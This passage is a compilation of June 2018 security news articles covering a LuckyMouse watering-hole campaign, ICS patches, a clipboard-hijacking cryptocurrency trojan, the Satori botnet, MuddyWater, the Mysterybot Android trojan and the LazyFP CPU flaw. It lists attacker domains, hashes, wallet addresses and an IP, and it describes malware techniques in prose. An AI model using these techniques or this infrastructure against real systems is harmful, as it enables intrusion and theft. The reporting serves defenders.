The websites were compromised to redirect visitors to instances of both ScanBox and BEeF. These redirects were implemented by adding two malicious scripts obfuscated by a tool similar to the Dean Edwards packer.

Resulting script on the compromised government websites

Users were redirected to https://google-updata[.]tk:443/hook.js, a BEeF instance, and https://windows-updata[.]tk:443/scanv1.8/i/?1, an empty ScanBox instance that answered a small piece of JavaScript code.

Conclusions
LuckyMouse appears to have been very active recently. The TTPs for this campaign are quite common for Chinese-speaking actors, where they typically provide new solid wrappers (launcher and decompressor protected with shikata_ga_nai in this case) around their RATs (HyperBro).

The most unusual and interesting point here is the target. A national data center is a valuable source of data that can also be abused to compromise official websites. Another interesting point is the Mikrotik router, which we believe was hacked specifically for the campaign. The reasons for this are not very clear: typically, Chinese-speaking actors don’t bother disguising their campaigns. Maybe these are the first steps in a new stealthier approach.

Some indicators of compromise
Droppers

22CBE2B0F1EF3F2B18B4C5AED6D7BB79
0D0320878946A73749111E6C94BF1525

Launcher
ac337bd5f6f18b8fe009e45d65a2b09b

HyperBro in-memory Trojan
04dece2662f648f619d9c0377a7ba7c0

Domains and IPs
bbs.sonypsps[.]com
update.iaacstudio[.]com
wh0am1.itbaydns[.]com
google-updata[.]tk
windows-updata[.]tk


Two Critical flaws affect Schneider Electric U.motion Builder. Patch them now!
17.6.2018 securityaffairs ICS

Schneider Electric has patched last week four flaws affecting the U.motion Builder software, including two critical command execution vulnerabilities.
Schneider Electric U.motion Builder is a tool designed for creating projects for U.motion devices that are used in critical manufacturing, energy, and commercial facilities industries.

“This exploit occurs when the submitted data of an input string is evaluated as a command by the application,” reads the advisory published by Schneider. “In this way, the attacker could execute code, read the stack, or cause a segmentation fault in the running application.”

The critical stack-based buffer overflow vulnerability tracked as CVE-2018-7784, it received the CVSS Score of 10.

The flaw was reported by the Chinese researcher who uses the online moniker “bigric3” that also reported a critical remote command injection vulnerability, tracked as CVE-2018-7785, that can lead to authentication bypass.

The CVE-2018-7785 Remote Command Injection flaw also has been assigned CVSS scores of 10.

Both flaws can be exploited easily exploited by a remote attacker without specific skills.

Schneider Electric U.motion Builder

Bigric3 has also reported a medium severity cross-site scripting (XSS) vulnerability, tracked as CVE-2018-7786, in the U.motion Builder application.

The last issue addressed by Schneider with the release of version 1.3.4 is an improper validation of input of context parameter in an HTTP GET request. The flaw, tracked as CVE-2018-7787, was reported by the CVE-2018-7787 Wei Gao of Ixia.

This issue has been classified as having medium severity.

The ICS-CERT and the U.S. National Cybersecurity & Communications Integration Center (NCCIC) have published a security advisory that also includes mitigations to minimize the risk of exploitation of this vulnerability.

According to the NCCIC, users should:

Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
Perform proper impact analysis and risk assessment prior to deploying defensive measures.


ClipboardWalletHijacker miner hijacks your Ether and Bitcoin transaction, over 300,000 computers have been infected
17.6.2018 securityaffairs
Virus

Researchers uncovered a new malware campaign spreading a clipboard hijacker dubbed ClipboardWalletHijacker that has already infected over 300,000 computers.
Security researchers from Qihoo 360 Total Security have spotted a new malware campaign spreading a clipboard hijacker, tracked as ClipboardWalletHijacker, that has already infected over 300,000 computers. Most of the victims are located in Asia, mainly China.

“Recently, 360 Security Center discovered a new type of actively spreading CryptoMiner, ClipboardWalletHijacker. The Trojan monitors clipboard activity to detect if it contains the account address of Bitcoin and Ethereum.” reads the analysis published by the company.

“It tampers with the receiving address to its own address to redirect the cryptocurrency to its own wallet. This kind of Trojans has been detected on more than 300 thousand computers within a week.”

Modus operandi for ClipboardWalletHijacker is not a novelty, the malware is able to monitor the Windows clipboard looking for Bitcoin and Ethereum addresses and replace them with the address managed by the malware’s authors.

In March 2018, researchers at Palo Alto Networks discovered a malware dubbed ComboJack that is able of detecting when users copy a cryptocurrency address and alter clipboards to steal cryptocurrencies and payments.

In a similar way, ClipboardWalletHijacker aims at hijacking BTC and ETH transactions.

Experts observed the malware using the following addresses when replacing legitimate ones detected in users’ clipboards:

BTC: 1FoSfmjZJFqFSsD2cGXuccM9QMMa28Wrn1
BTC: 19gdjoWaE8i9XPbWoDbixev99MvvXUSNZL
ETH: 0x004D3416DA40338fAf9E772388A93fAF5059bFd5
below the function the replace the legitimate Ethereum wallet address with the attackers’ one:
ClipboardWalletHijacker
By replacing the address with the following one: “0x004D3416DA40338fAf9E772388A93fAF5059bFd5” the hackers have successfully hijacked 46 transactions.

Below the balances of these addresses:

https://blockchain.info/address/1FoSfmjZJFqFSsD2cGXuccM9QMMa28Wrn1
https://blockchain.info/address/19gdjoWaE8i9XPbWoDbixev99MvvXUSNZL
https://etherscan.io/address/0x004D3416DA40338fAf9E772388A93fAF5059bFd5
Hackers have stolen a total 0.12434321 BTC from eight transactions and no Ether, for a total of around $800.

Recently Qihoo discovered many other miners, such as TaksHostMiner and WagonlitSwfMiner that infected dozens of thousands of machines.

“Recently, we have found that a lot of CryptoMiner Trojans are using this technique to steal victims’ cryptocurrencies.” concludes the company. “We strongly recommend users to enable antivirus software while installing new applications. Users are also recommended to run virus scan with 360 Total Security to avoid falling victim to CryptoMiner.”


Satori botnet is back again, experts observed a surge in port scan activity associated with it
17.6.2018 securityaffairs BotNet

This week, security experts observed a surge in port 8000 scan activity, researchers at Qihoo 360 Netlab determined that the unusual activity was associated with Satori IoT botnet.
Experts from Qihoo 360 Netlab discovered that the author of the Satori botnet have integrated a the proof-of-concept (PoC) code for the XionMai web server software package after it was published on June 8.

The code recently included in the Satori botnet exploits a buffer overflow vulnerability, tracked as CVE-2018-10088, in XionMai uc-httpd 1.0.0. The exploit could be used by remote attackers to execute arbitrary code by sending a malformed package via ports 80 or 8000.

“Two days ago, on 2018-06-14, we noticed that an updated Satori botnet began to perform network wide scan looking for uc–httpd 1.0.0 devices.” reads the report published by Qihoo 360 Netlab.

“Most likely for the vulnerability of XiongMai uc–httpd 1.0.0 (CVE-2018-10088). The scanning activities led to a surge in scanning traffic on ports 80 and 8000.”

Satori botnet scan-on-port-80

Satori botnet scan-on-port-8000

The lightweight web server package XionMai is often included in the firmware of many IoT devices from Chinese vendors.

Data collected by honeypots used by Qihoo 360 Netlab and SANS ISC confirms the Satori authors also included a second exploit, it allows the bot to target D-Link DSL-2750B devices.

The experts observed port 8000 scans drop down on June 15, the attackers started exploiting the PoC code against D-Link DSL-2750B routers exploited via ports 80 and 8080.

Satori botnet scan on port 8080

The experts started seeing a surge in scans for the above ports, instead of port 8000 associated with XionMai.

Data collected by security experts demonstrate the evolution of the Satori botnet, its author continues to include new exploit to make the botnet resilient to the takedown of law enforcement and security firm.

Further details, including Indicators of compromise (IoCs) for the Satori botnet are available in Qihoo 360 Netlab report.


Europol dismantled the Rex Mundi hacker crew, it arrested another member of the gang
16.6.2018 securityaffairs BigBrothers

The Europol announced that several French nationals were arrested in the past year on suspicion of being involved with notorious Rex Mundi crime gang.
Another success of the Europol made the headlines, the European police announced that several French nationals were arrested in the past year on suspicion of being involved with notorious hacker group known as Rex Mundi (“King of the World”).

The Rex Mundi crime group has been active since at least 2012. it hacked into the systems of several organizations worldwide and attempted to blackmail them.

The list of the victims is long and includes AmeriCash Advance, Webassur, Drake International, Buy Way, Hoststar, Websolutions.it, Numericable, Habeas, AlfaNet, Domino’s Pizza, and the Swiss bank Banque Cantonale de Geneve (BCGE).


The hackers used to steal sensitive information from the victims, then they demanded fees for not disclosing the stolen data.

The operation coordinated by the Europol was launched in May 2017 after the group targeted a UK-based company. Crooks stole significant amounts of customer data from the company, then attempted to blackmail it by demanding the payment of a bitcoin ransom of nearly €580,000 ($670,000) for not disclosing the incident. The group also requested more than €825,000 ($776,000) for details on the hack.

The hackers also asked the victim additional €210,000 ($240,000) for each day the payment was delayed.

“A 25-year-old coder was arrested on 18 May by the Royal Thai Police based on a French international arrest warrant. The arrest of this young cybercriminal was the eight in an international operation supported by Europol and the Joint Cybercrime Action Taskforce (J-CAT) that started exactly one year ago.” reads the announcement published by the Europol.

“In May 2017 a British-based company was the victim of a cyber-attack during which a large amount of customer data was compromised. The attack was immediately claimed by an organisation called Rex Mundi.”

After the victim reported the incident to the authorities, the UK’s Metropolitan Police, the French National Police and Europol launched a joint operation that lead to the identification of a French national.

“Within an hour, Europol’s 24/7 Operational Centre was able to link the available information to a French national,” continues the Europol.

In June 2017, the authorities identified and arrested five suspects, two were arrested in October 2017 and one on May 18, 2018.

All of the suspects are French nationals and they were all arrested by French police, except for the last arrest, which took place in Thailand.

The last member of the crew is a 25-year-old developer that was arrested last month by the Royal Thai Police.

The leader of the Rex Mundi group admitted blackmailing the company but claimed to have hired hackers on the Dark Web to hack the victims.


Singapore was hit by an unprecedented number of attacks during the Trump-Kim Summit
16.6.2018 securityaffairs BigBrothers

Researchers observed a spike in the number of cyber-attacks targeting Singapore during the Trump-Kim Summit, from June 11 to June 12.
Researchers at F5 Labs have observed a spike in the number of cyber-attacks targeting Singapore from June 11 to June 12, in the wake of the meeting between U.S. President Donald Trump and North Korean President Kim Jong-un in a Singapore hotel.

Experts remarked that typically Singapore is not a top attack destination, and the skipe of the number of attacks coincides with Trump-Kim Jong-un meeting.

Most of the attacks originated from Russia (88% of overall attacks) and frankly speaking, I’m not surprised due to the importance of the Trump-Kim summit.

According to F5 Labs and Loryka, 97% of all the attacks that originated from Russian from June 11 to June 12 targeted Singapore.

“From June 11 to June 12, 2018, F5 Labs, in concert with our data partner, Loryka, found that cyber-attacks targeting Singapore skyrocketed, 88% of which originated from Russia. What’s more, 97% of all attacks coming from Russia during this time period targeted Singapore.” reads the analysis published by F5 Labs. “We cannot prove they were nation-state sponsored attacks, however the attacks coincide with the day President Donald Trump met with North Korean President Kim Jong-un in a Singapore hotel.”

The cyber attacks hit almost any computer system, from VoIP phones to IoT devices. The attacks began out of Brazil targeting port SIP 5060 of IP phones where communications are transmitted in clear text.

After an initial attack that lasted for a couple of hours, researchers observed a reconnaissance activity originated from the Russian IP address 188.246.234.60 that is owned by ASN 49505, operated by Selectel; the scans targeted a variety of ports.

None of the attacks was carried out to spread malware.

“The number two attacked port was Telnet, consistent with IoT device attacks that could be leveraged to gain access to or listen in on targets of interest.” continues the analysis.

“Other ports attacked include the SQL database port 1433, web traffic ports 81 and 8080, port 7541, which was used by Mirai and Annie to target ISP-managed routers, and port 8291, which was targeted by Hajime to PDoS MikroTik routers.”

Singapore was hit by 40,000 attacks in just 21 hours, starting at 11:00 p.m. on June 11 through 8:00 p.m. June 12, local time.

The experts highlighted that only 8% were exploit attacks, while 92% were reconnaissance scans for potential targets.

34% of the attacks originated from Russia, the list of top attackers includes China, the US, France, and Italy.

Singapore attacks Trump-Kim Summit

Trump-Kim Summit

During the summit time frame, Singapore was the top destination of cyber-attacks, it received 4.5 times more attacks than countries like the U.S. and Canada.

The SIP port 5060 was targeted 25 times more than Telnet port 23, hackers were attempting to gain access to insecure communication systems or VoIP server and to compromise IoT devices to spy on communications.

“We do not have evidence directly tying this attacking activity to nation-state-sponsored attacks, however it is common knowledge that the Russian government has many contractors within Russia doing their bidding, and that a successful attack on a target of interest would make its way through to the Kremlin,” F5 Labs concludes.


Syscoin Github has been breached, hacker replaced Syscoin Windows client with tainted version
16.6.2018 securityaffairs Cryptocurrency

The GitHub account of the Syscoin cryptocurrency was compromised by hackers that replaced the official Syscoin Windows client with a tainted version.
The Syscoin clients allow users to mine Syscoin cryptocurrency or manage Syscoin funds.

Syscoin Windows client

The other versions in the v3.0.4.1 release were not replaced, this means that Mac and Linux clients were not replaced by the hackers.

The tainted version of the Syscoin Windows client contained the Arkei data stealer (aka Trojan:Win32/Feury.B!cl), a malicious code used to steal passwords and wallet private keys.

The Syscoin development team is warning users downloaded the Syscoin Windows client version 3.0.4.1 between June 09, 2018 10:14 PM UTC and June 13, 2018 10:23 PM UTC that their machines might be infected.

“The Syscoin developers found that a malicious, unsigned copy of the Windows Syscoin 3.0.4.1 installer was made available via the Syscoin Github release page on June 9th, 2018 due to a compromised GitHub account. This installer contained malicious code. (Trojan:Win32/Feury.B!cl)” reads the security notice published by the development team.

“The virustotal scan of the malicious file named “re.exe” that is saved to the local temp folder (C:\Users\user\AppData\Local\Temp) upon running the fake installer: https://www.virustotal.com/#/file/b105d2db66865200d1b235c931026bf44428eb7327393bf76fdd4e96f1c622a1/detection“

The Syscoin team discovered the security breach after receiving a warning from users that Windows Defender SmartScreen, AVG and Kaspersky was marking downloads of the Syscoin Windows client as a virus.

The affected executables are:

syscoincore-3.0.4-win32-setup.exe
syscoincore-3.0.4-win64-setup.exe
Syscoin team removed the malicious files and issued a security notice that includes the instructions to determine the installation date:

Right-click on syscoin-qt.exe in C:\Users[USERNAME]\AppData\Roaming\SyscoinCore or view in detailed list mode and make a note of the modified date.
OR go to Settings->Apps and make a note of the installation date.
If the modified/installation date is between June 9th, 2018, and June 13th, 2018, the team suggests users taking the following actions:

Backup any important data including wallets onto another storage medium outside of the affected computer. Treat this data cautiously as it may contain infectious code.
Run an up-to-date virus scanner on your system to remove the threat.
Passwords entered since the time of the infection should be changed from a separate device after ensuring the threat has been removed.
Funds in unencrypted wallets or wallets that had been unlocked during the infection period, should be moved to a newly generated wallet on a secure computer.
The Syscoin team announced additional measures to protect its users and their assets such the usage of two-factor authentication (2FA) for its developers and routine (file signature) checks of the files available for download to detect any modification of the repository.

“We are working with Github to improve the release page experience to provide information regarding the modifying account as well as the last modification date of a release. This would allow users to detect if certain binaries were updated for potentially malicious purposes.” concludes the notice.

“All individuals responsible for Github releases should enable 2FA and ensure they have deterministic signature hashes for files on a regular basis.”


Trump-Kim Summit Attracts Wave of Cyber-Attacks on Singapore
16.6.2018 securityweek BigBrothers

The number of cyber-attacks targeting Singapore skyrocketed from June 11 to June 12, during the meeting between U.S. President Donald Trump and North Korean President Kim Jong-un in a Singapore hotel, and most of these attacks originated from Russia, F5 Labs reports.

Russia has long been said to keep the United States under a continuous barrage of cyber-attacks, and even attracted a series of sanctions following the hacking aimed at the 2016 presidential election, which was supposedly the doing of state-sponsored Russian threat actors.

Thus, it’s no wonder the Trump-Kim summit earlier this week was targeted as well, but the number of assaults coming from Russia is indeed impressive: 88% of the total number of observed cyber-attacks came from this country. Furthermore, 97% of all the attacks that originated from Russian during the timeframe targeted Singapore, data from F5 Labs and Loryka reveals.

“We cannot prove they were nation-state sponsored attacks, however the attacks coincide with the day President Donald Trump met with North Korean President Kim Jong-un in a Singapore hotel. The attacks targeted VoIP phones and IoT devices, which appears to be more than a mere coincidence,” F5 says.

The flurry of attacks, the security firm reveals, started out of Brazil by targeting port SIP 5060, the single most attacked port in the timeframe. IP phones use this port to send and receive communications in clear text.

This initial phase, which lasted for only a couple of hours, was followed by reconnaissance scans from the Russian IP address 188.246.234.60 – an IP owned by ASN 49505, operated by Selectel – targeting a variety of ports.

The attacks observed on June 11 and June 12 also targeted the Telnet port, which is normally assaulted in Internet of Things (IoT) incidents. Other targeted ports include SQL database port 1433, web traffic ports 81 and 8080, port 7541 (used by Mirai and Annie to target ISP-managed routers), and port 8291 (previously targeted by Hajime).

During a period of 21 hours, starting at 11:00 p.m. on June 11 through 8:00 p.m. June 12, local time, a total of 40,000 attacks were launched on Singapore. Of these, 92% were reconnaissance scans looking for vulnerable devices, while the remaining 8% were exploit attacks.

“Thirty-four percent of the attacks originated from Russian IP addresses. China, US, France, and Italy round out the top 5 attackers in this period, all of which launched between 2.5 to 3 times fewer attacks than Russia. Brazil, in the sixth position, was the only other country we detected launching SIP attacks alongside Russia,” F5 reveals.

During the period, Singapore became the top destination of cyber-attacks by a large margin, receiving 4.5 times more attacks than the U.S. or Canada. Typically, Singapore is not a top attack destination, and the anomaly coincides with President Trump’s meeting with Kim Jong-un.

While Russia was the main source of attacks, accounting for 88% of them, Brazil was the second largest attacker, launching 8% of the assaults. Germany rounded up top three attackers, with 2%.

The security researchers also note that there was no attempt made to conceal the attacks launched from Russia and that none of the attacks originating from this country carried malware.

The SIP port 5060 received 25 times more attacks than Telnet port 23, which was the second most targeted. Although attacks on port 5060 are unusual, chances are that the attackers were attempting to gain access to insecure phones or perhaps the VoIP server. The attacks on Telnet were likely trying to compromise IoT devices to spy on communications and collect data.

“We do not have evidence directly tying this attacking activity to nation-state-sponsored attacks, however it is common knowledge that the Russian government has many contractors within Russia doing their bidding, and that a successful attack on a target of interest would make its way through to the Kremlin,” F5 concludes.


Microsoft Patches Code Execution Vulnerability in wimgapi Library
16.6.2018 securityweek
Vulnerebility

Microsoft this week patched a remote code execution vulnerability affecting the wimgapi library, which is used to perform operations on Windows Imaging Format (WIM) files.

Addressed as part of Microsoft’s June 2018 Patch Tuesday, the issue was discovered by Talos’ Marcin Noga in the LoadIntegrityInfo functions of wimgapi version 10.0.16299.15 (WinBuild.160101.0800). An attacker exploiting the flaw could use a specially crafted WIM image to cause heap corruption and achieve direct code execution.

Tracked as CVE-2018-8210, the vulnerability resides in the DLL used to perform operations on the file-based disk image format that Microsoft created to simplify the deployment of Windows systems. The bug manifests in the LoadIntegrityInfo function when a WIM file header is parsed and can be triggered “even on the simplest operations performed on malformed WIM file,” the researcher says.

“For example, it is enough if an application tries to open the WIM file via the WIMCreateFile function and requests a file handle. The function allocates heap memory based on a user-controlled size value, and uses another user-controlled value to read n bytes from the file into this buffer. It is using these values without any prior input checks,” Noga explains.

An attacker exploiting the vulnerability could execute malicious code with the same access rights as the logged-in user. They could also crash the system with a denial-of-service attack, the researcher says. Because WIM files do not have a registered file type handler by default, the issue cannot be triggered if the user double-clicks a WIM file, unless a file-handler was registered first.

According to Talos, the vulnerability has a CVSSv3 score of 8.8. Microsoft, on the other hand, claims that the bug only has a CVSS score of 7.3 and that it is considered Important.

The remote code execution vulnerability “exists when Windows improperly handles objects in memory,” the software giant explains. The company also notes that an attacker able to successfully exploit the issue could control a vulnerable system.

Microsoft also adds that an attacker targeting the vulnerability “would first have to log on to the target system and then run a specially crafted application.”

To address the vulnerability, Microsoft released an update that corrects the manner in which Windows handles objects in memory. No mitigations or workarounds exist for this vulnerability, meaning that users need to install the recently released patch to keep systems safe.

Impacted products include Windows 10 (both 32-bit and 64-bit versions), Windows 8.1 (32-bit and 64-bit), Windows RT 8.1, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016, Windows Server version 1709, and Windows Server version 1803.


French Nationals Arrested for 'Rex Mundi' Hacks
16.6.2018 securityweek BigBrothers

Europol announced this week that several French nationals were arrested in the past year on suspicion of being involved with Rex Mundi, a group that hacked into the systems of several organizations and attempted to blackmail them.

According to Europol, the alleged members of the hacker group were identified after in May 2017 they targeted a UK-based company. The cybercriminals stole significant amounts of customer data from the firm and demanded the payment of a bitcoin ransom of nearly €580,000 ($670,000) for not making the stolen files public or more than €825,000 ($776,000) for information on how the attack was carried out. The hackers also told the victim that the amounts would increase by €210,000 ($240,000) for each day the payment was delayed.

After the victim reported the attack to law enforcement, the UK’s Metropolitan Police, the French National Police and Europol teamed up to identify the hackers. “Within an hour, Europol’s 24/7 Operational Centre was able to link the available information to a French national,” Europol said.

Five suspects were arrested in June 2017, two were arrested in October 2017 and one was apprehended on May 18, 2018. All of the suspects are French nationals and they were all arrested by French police, except for the last arrest, which took place in Thailand.

The individual who was arrested last month by the Royal Thai Police is a 25-year-old developer. The suspects arrested in October 2017 were described as “hackers.” The “main suspect,” as Europol describes him, admitted blackmailing companies, but claimed to have used the dark web to hire someone to conduct the hacking.

Rex Mundi was active since at least 2012 and until 2015 it made many of its operations public in hopes of convincing victims to pay up. Its victims included AmeriCash Advance, Webassur, Drake International, Buy Way, Hoststar, Websolutions.it, Numericable, Habeas, AlfaNet, Domino’s Pizza, and the Swiss bank Banque Cantonale de Geneve (BCGE). Many of the hacker group’s victims were Belgian companies.


New Campaign Possibly Linked to MuddyWater
16.6.2018 securityweek CyberSpy

A newly discovered attack relying on malicious Word documents and PowerShell scripts appears related to the MuddyWater cyber-espionage campaign, Trend Micro reports.

First observed in 2017, the MuddyWater campaign was targeting the Saudi government with PowerShell scripts deployed via Microsoft Office Word macros. A similar espionage campaign observed in March 2018 was targeting organizations in Turkey, Pakistan and Tajikistan.

The attacks, which are rather difficult to clear up, were previously associated with the FIN7 hacking group, but artifacts observed in multiple assaults were also linked to a single framework last year.

Discovered last month, the new campaign bears the hallmarks of MuddyWater and attempts to distribute a backdoor through Word documents that execute PowerShell scripts, Trend Micro says. Unlike previous attacks, however, the samples don’t attempt to download the scripts, but have them encoded in the document itself.

The campaign, however, does have characteristics that appear to connect it to the MuddyWater attacks, such as the use of malicious documents with embedded macros, and the obfuscation method used for the macro scripts.

A lure document claiming to be a reward or a promotion was used as part of the new attack, instead of the previously seen documents dealing with government or telecommunications-related issues. Because of this change, Trend Micro suggests that the attacks would no longer be limited to specific industries or organizations.

Once the intended victim opens the document, they are enticed into enabling the macro to view its full content. The macro uses the Document_Open() event to execute a malicious routine. Two PowerShell scripts are executed, with the second being designed to drop various components on the compromised machine.

The final payload used in this campaign is the PRB-Backdoor remote access Trojan (RAT) that was previously analyzed in May 2018. The malware communicates with a command and control (C&C) server at outl00k[.]net and includes support for a broad range of commands.

Based on the received instructions, the malware can initialize a connection with the C&C, register the infected system, gather browsing history from installed browsers and send it to the C&C, steal passwords found in the browser, read and write files, execute shell commands, log keystrokes, capture screenshots, update functions, gather system information, and initialize DNS sessions.

Last month, the security researcher behind Security 0wnage revealed that there was no reference to PRB-Backdoor or its code on public sources.

“If these samples are indeed related to MuddyWater, this means that the threat actors behind MuddyWater are continuously evolving their tools and techniques to make them more effective and persistent,” Trend Micro notes.


India-based Network Intelligence Raises for $4.8 Million for Expansion
16.6.2018 securityweek IT

Bengaluru, India-based security services and products firm Network Intelligence Inc (NII) has raised Rs 33-crore funding (approximately $4.8 million) from private equity firm Helix Investments. The money will be used for product development and to expand operations in the U.S. and Europe. The investment values the firm at $22.7 million.

NII was founded in 2001, and provides information security services, consultancy and products. It offers assessment, advisory, remediation, training, and managed services; and is an Indian VAR for leading global security firms and products -- such as McAfee, Imperva, Cyber-Ark and FortiGate. NII also sells its own products, Firesec and Insight.

Firesec delivers an analysis of firewall rules for medium to large enterprises. It can purge redundant rules, group similar rules, and find vulnerable rule patterns. Insight is a vulnerability management suite that can manage assets, assess vulnerabilities, and determine compliance status.

"We are going to deploy the funds for two purposes," said KK Mookhey, CEO of NII: "expanding to the US and Europe and to enhance product development initiatives. Around 60% of our revenues are from the banking, financial services and insurance (BFSI) sector and the rest from critical infrastructure like oil and gas and also from IT."

NII employs around 450 people, primarily in India and the Middle East. Its operations centers are in Mumbai and Dubai, and it has recently established operations in the U.S. and Singapore.

Helix Investment is an India-focused private equity fund that aims to invest around $20 million annually in India -- typically at around $5 million to $15 million at a time. The fund is sponsored by Culbro LLC, the private equity investment vehicle of the Cullman family of New York and by Bloomingdale Properties, a US based investment and real estate company.


A new MuddyWater Campaign spreads Powershell-based PRB-Backdoor
16.6.2018 securityaffairs APT

Trend Micro spotted a new attack relying on weaponized Word documents and PowerShell scripts that appears related to the MuddyWater APT.
Security experts at Trend Micro have spotted a new attack relying on weaponized Word documents and PowerShell scripts that appears related to the MuddyWater cyber-espionage campaign.

The first MuddyWater campaign was observed in late 2017, then researchers from Palo Alto Networks were investigating a mysterious wave of attacks in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing these attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

Threat actors used PowerShell-based first stage backdoor named POWERSTATS, across the time the hackers changed tools and techniques.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by TEMP.Zagros group (another name used by the experts to track the MuddyWater), targeting Asia and Middle East regions from January 2018 to March 2018.

Attackers used weaponized documents typically having geopolitical themes, such as documents purporting to be from the National Assembly of Pakistan or the Institute for Development and Research in Banking Technology.

The attacks have been mistakenly associated with the FIN7 group, when Palo Alto discovered the first campaign reported that a C&C server delivering the FIN7-linked DNSMessenger tool was involved in MuddyWater attacks as well.

The new campaign discovered by the experts presents many similarities with previous ones conducted by the same threat actor, attackers attempted to distribute a backdoor through weaponized Word documents that execute PowerShell scripts.

“In May 2018, we found a new sample (Detected as W2KM_DLOADR.UHAOEEN) that may be related to this campaign. Like the previous campaigns, these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell (PS) scripts leading to a backdoor payload.” reads the analysis published by Trend Micro.

“One notable difference in the analyzed samples is that they do not directly download the Visual Basic Script(VBS) and PowerShell component files, and instead encode all the scripts on the document itself. The scripts will then be decoded and dropped to execute the payload without needing to download the component files.”

Unlike previous campaigns, the samples don’t directly download the malicious scripts because they are encoded in the document itself.

MuddyWater New

The bait document used in the campaign claims to be a reward or a promotion, a circumstance that suggests the hackers are targeting entities in other industries,

Once the victim opens the document, he is enticed into enabling the macro to view its full content.

“Once the macro is enabled, it will use the Document_Open() event to automatically execute the malicious routine if either a new document using the same template is opened or when the template itself is opened as a document0.” continues the analysis.

The code executes two PowerShell scripts, with the second is used by attackers to drop various components on the compromised machine.

The final payload delivered in the last campaign is the PRB-BackdoorRAT, it was controlled by the command and control (C&C) server at outl00k[.]net.

The backdoor can execute a broad range of commands, including gather browsing history from installed browsers, exfiltrate passwords found in the browser, read and write files, execute shell commands, log keystrokes and capture screenshots.

“If these samples are indeed related to MuddyWater, this means that the threat actors behind MuddyWater are continuously evolving their tools and techniques to make them more effective and persistent,” Trend Micro concludes.


Mysterybot, a new LokiBot-Linked Android Trojan Emerges
16.6.2018 securityaffairs Android

Threat Fabric reports of a newly discovered banking Trojan, dubbed Mysterybot, targeting Android 7 and 8 versions, the malware seems to be linked to Lokibot.
Threat Fabric (formerly known as SfyLabs) reports of a newly discovered banking Trojan targeting Android 7 and 8 versions. It seems to be linked to Lokibot, the hydra of the Android malware zoo, because it uses the same command and control (C&C) server.

Mysterybot

The recently discovered banking Trojan, dubbed Mysterybot, seems to be an update of Lokibot, or belonging to the same family of Trojan malware.

Lokibot is known as the hydra of the Android malware zoo, because it has Android Trojan and ransomware capabilities. Killing one does not kill the other.

Mysterybot features improved commands compared to Lokibot, a new name, and modified network communication.

“Although certain Android banking malware families such as but not limited to ExoBot 2.5, Anubis II, DiseaseBot have been exploring new techniques to perform overlay attacks on Android 7 and 8, it seems that the actor(s) behind Mysterybot have successfully implemented a workaround solution and have spent some time on innovation,”

Here is a list of the ‘innovative’ features the researchers discovered:

The supported commands include: call a given phone number, fetch contact list information, forward calls, copy all SMS messages, log keystrokes, encrypt files on external storage and delete all contacts, send an SMS message to all contacts, change default SMS app, call a USSD number, delete all SMS messages and send SMS messages.
Phishing functionality by using a new technique to overlay phishing pages on top of legitimate apps on Android 7 and 8 devices. Restrictions in Security-Enhanced Linux (SELinux) and other security controls in new Android versions were built to prevent malware from displaying fake windows over legitimate apps. The new technique leverages the Android PACKAGE_USAGE_STATS permission (Usage Access permission) to bypass the restrictions, and also abuses the AccessibilityService to get the permission.
The Mysterybot malware use case works like this: the malware, posing as an Adobe Flash Player App, asks the victim to grant it the Usage Access permission, which enables its villainous capabilities. The malware then attempts to monitor package names of the applications in the foreground. It targets over 100 applications with the overlays, including mobile banking and social platform apps.
Next to this Mysterybot uses a new method of logging keystrokes: it calculates the location of the keys on the screen and places a different View over each of them, allowing it to register which keys have been pressed. However, it seems to be under development, because Mysterybot can’t yet send the logged keystrokes to the C&C server.
As Lokibot, Mysterybot also has ransomware capabilities, managed from a separate dashboard than the Trojan. It encrypts each file in the External Storage Directory, and then deletes the original ones. Mysterybot places each file in a ZIP archive (password-protected), but uses the same password for all archives (runtime-generated key). After the encryption is ready, the malware displays a dialogue claiming the victim watched pornographic material and instructing them to contact the attacker via email.
The passwords Mysterybot uses for the ZIP archive are 8 characters long, Latin alphabet characters (upper and lowercase) combined with numbers.
It seems the IDs assigned to the victims can be used for multiple victims, because the IDs assigned to each victim can only be a number between 0 and 9,999.
Mysterybot seems to be the next step in the evolution of Android banking malware, inheriting from the hydra Lokibot, and at the same time improving it by being a banking Trojan, ransomware, and keylogger in one malware agent.

About the author

Cordny Nederkoorn

Software test engineer, Founder TestingSaaS, a social network about researching cloud applications with a focus on forensics, software testing and security.


A new Meltdown-like flaw tracked as LazyFP affects Intel CPUs

16.6.2018 securityaffairs Vulnerebility

A new vulnerability involving side channel speculative execution on Intel chips, known as LazyFP, has been announced and assigned CVE-2018-3665.
A new vulnerability tracked as LazyFP (CVE-2018-3665) involving side channel speculative execution affects Intel CPUs, like previous ones it could be exploited by hackers to access sensitive information from the affected system.

The vulnerability was discovered by Julian Stecklina from Amazon Germany, Thomas Prescher from Cyberus Technology and Zdenek Sojka from SYSGO AG.

The vulnerability resides in the floating point unit (FPU) that is used by the operating system when switching between processes. It is used to save the current context (state of the current process and registries) and restores the context of the new process.

“System software may opt to utilize Lazy FP state restore instead of eager save and restore of the state upon a context switch. Lazy restored states are potentially vulnerable to exploits where one process may infer register values of other processes through a speculative execution side channel that infers their value,” reads the advisory published by Intel.

There are two types of switching, Lazy FPU and Eager FPU, the former has better performance on older systems.

Security researchers discovered recently that if the Lazy method if vulnerable to attacks that could expose FPU state data, which can contain sensitive information such as cryptographic keys.

“The register state of the floating point unit (FPU), which consists of the AVX, MMX and SSE register sets, can be leaked across protection domain boundaries. This includes leaking across process- and virtual machine boundaries.” reads the analysis published by Thomas Prescher, Julian Stecklina, Jacek Galowicz

“The FPU state may contain sensitive information such as cryptographic keys.”

According to the expert, the CVE-2018-3665 vulnerability is similar to Meltdown Variant 3a.

